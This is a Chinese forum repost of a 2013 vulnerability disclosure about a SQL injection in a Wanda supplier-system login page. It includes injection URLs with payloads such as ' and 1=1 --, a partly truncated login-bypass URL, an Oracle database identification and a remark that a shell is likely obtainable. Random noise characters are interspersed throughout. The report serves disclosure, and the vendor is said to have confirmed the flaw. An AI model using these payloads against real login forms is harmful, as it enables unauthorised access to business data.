找回密码
 立即注册
查看: 3136|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。
' l2 n. O$ f. b) W详细说明:% g# |' P5 ^+ k7 _2 O" y( y
万达scm系统登陆框sql注入。- P' k* ^( `. o  V: {9 I# c8 K2 a; d  p
8 a" K% R) [3 E6 f4 w
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%274 C' l# q9 t) D8 z
% n4 a1 a3 y& X/ X0 g( q
/ h8 e! k/ P* W8 b  D$ M# U
500错误。* y6 a7 i: {) I; ?* ]' x1 c! [
2 p2 b3 o  a2 O
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。$ G% I( d: ~& H% V7 M
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
4 Z; z- E1 {' D" Y7 e) T0 K截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
) U$ Y, {  @* S/ D7 x经过分析,登陆验证的过程应该是:! f# h. F, k" Q6 f' H% ~" T4 B- n
, O  E( A) Z$ h3 k% P
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
8 h- b" ?* q8 m% jhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png  a' `# o7 Y; C# i1 A/ {
8 h/ o/ l" q) K7 f2 Y: r3 K3 `9 \
oracle数据库,存在注入点。@大连万达,你怎么看?
9 k3 K6 @) n2 g" {8 g; I- V) ^7 `2 Whttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png  z% A' s# V2 ^  ~5 M# N

$ e0 W6 s" G* `1 g) [: R  J系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。3 ]9 b, ]# o: d$ n3 N
漏洞证明:
7 ^( a. g! g, m3 I万达scm系统登陆框sql注入。6 ]  s; S2 {$ k: Y
& T! }  q: m9 f. @# \! G* A8 P
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
% m. c: z1 _9 I- ^7 K( e% Z; Y
( }' b+ @6 v+ V7 p  R( v6 p4 M* A% g# I+ w- B8 @5 N0 O% Y" g$ V
500错误。( S% t. D# H) ~! [7 W
& s% e* m7 d% D1 H
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
9 R% e  ?5 ^) K& u  J0 Y0 G7 [" i- Ahttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png  c% R3 `+ a4 {# f' a9 |

' S6 W( }( h  a8 D6 v
6 ^" a8 f6 _2 y* H  X(截图有一点问题)9 i5 R# g3 O4 ]( G. F9 C

0 Z, z; D* J8 \2 P! N+ N怎么饶都饶不过去;经过分析,登陆验证的过程应该是:% M) S3 i2 G/ M! E  _% I- f$ v

0 x4 Q4 l, m! b; q' M取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
- L# h& q. w( I2 w/ e8 Q
* \6 l6 {7 X+ B! v7 J绕过:
7 k* b# n% _* F: A/ c# Z3 g2 Ghttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1/ Y. Z+ c2 D9 |) b9 u3 O# n
: f, Y- Z9 t: ?7 D) k. ]
/ V( `( a- f8 ^3 n5 c
oracle数据库,存在注入点。@大连万达,你怎么看?
+ N3 g* _4 S3 c​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。, [: b: W  V7 a! I4 }2 e/ L) [
0 O: a% N$ C2 i: p7 |
修复方案:* x2 N3 N: q: Z; _
。。。; A/ Z# O# k9 `4 R: l6 U/ ?

9 j2 Z2 A. R) \) ~4 M6 M, w' g1 {4 q6 w- F) x6 _
厂商已经确认
( g5 J( G9 s5 Q1 Z% m9 g2 i; `6 T# u* o7 {2 z
[/td][/tr]* n3 F2 ]* X1 `& w  }% h: K. A, b
[/table]! q* K! O, k0 @3 S, V

+ m2 v8 ?! N. J3 R" [, C+ x! l7 \4 |; I  g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表